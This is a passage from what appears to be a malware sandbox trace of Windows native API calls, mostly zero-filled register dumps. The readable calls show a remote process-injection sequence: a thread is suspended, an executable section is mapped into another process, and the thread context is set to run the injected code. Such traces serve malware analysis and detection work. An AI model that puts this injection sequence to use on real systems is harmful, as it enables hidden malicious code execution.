[83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0139.829] NtResumeThread (in: ThreadHandle=0x1a0, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0139.830] NtClose (Handle=0x1a4) returned 0x0 [0139.830] NtClose (Handle=0x1a0) returned 0x0 [0139.831] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0x11c4, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0x1a0) returned 0x0 [0139.831] NtQueryInformationProcess (in: ProcessHandle=0x1a0, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0139.831] NtQueryInformationProcess (in: ProcessHandle=0x1a0, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0139.831] NtReadVirtualMemory (in: ProcessHandle=0x1a0, BaseAddress=0x375000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0139.831] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0139.833] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0x11c8) | out: ThreadHandle=0xdea64*=0x1a4) returned 0x0 [0139.833] NtSuspendThread (in: ThreadHandle=0x1a4, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0139.833] NtMapViewOfSection (in: SectionHandle=0x184, ProcessHandle=0x1a0, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x2290000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0139.839] NtGetContextThread (in: ThreadHandle=0x1a4, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x375000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x7561895c, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0139.841] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x1a8) returned 0x0 [0139.841] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0x13c200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x75d0000, SectionOffset=0x0, ViewSize=0xde6ac*=0x13d000) returned 0x0 [0139.848] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0x1a0, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0x13c200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0x590000, SectionOffset=0x0, ViewSize=0xde6e8*=0x13d000) returned 0x0 [0139.870] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x75d0000) returned 0x0 [0139.877] NtClose (Handle=0x1a8) returned 0x0 [0139.877] NtSetContextThread (ThreadHandle=0x1a4, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x375000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x639717, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, 